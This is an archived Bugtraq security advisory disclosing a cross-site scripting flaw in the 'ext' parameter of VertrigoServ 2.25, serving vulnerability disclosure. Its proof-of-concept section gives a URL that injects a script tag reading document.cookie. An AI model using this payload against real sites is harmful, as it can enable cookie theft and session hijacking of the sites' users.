[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201201051727.q05HRg0D009262@sf01web3.securityfocus.com>
Date: Thu, 5 Jan 2012 17:27:42 GMT
From: security@...oserve.de
To: bugtraq@...urityfocus.com
Subject: VertrigoServ 2.25 Cross-Site-Scripting vulnerability
Advisory: VertrigoServ 2.25 Cross-Site-Scripting vulnerability
Advisory ID: INFOSERVE-ADV2011-11
Author: Stefan Schurtz
Contact: security@...oserve.de
Affected Software: Successfully tested on VertrigoServ 2.25
Vendor URL: http://vertrigo.sourceforge.net/
Vendor Status: informed
==========================
Vulnerability Description
==========================
VertrigoServ 2.25 'ext' parameter is prone to a Cross-site-Scripting vulnerability
==================
PoC-Exploit
==================
http://[target]/inc/extensions.php?mode=extensions&ext='"</script><script>alert(document.cookie)</script>
=========
Solution
=========
-
====================
Disclosure Timeline
====================
15-Dec-2011 - informed vendor
16-Dec-2011 - vendor feedback
========
Credits
========
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
===========
References
===========
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-11.txt
Powered by blists - more mailing lists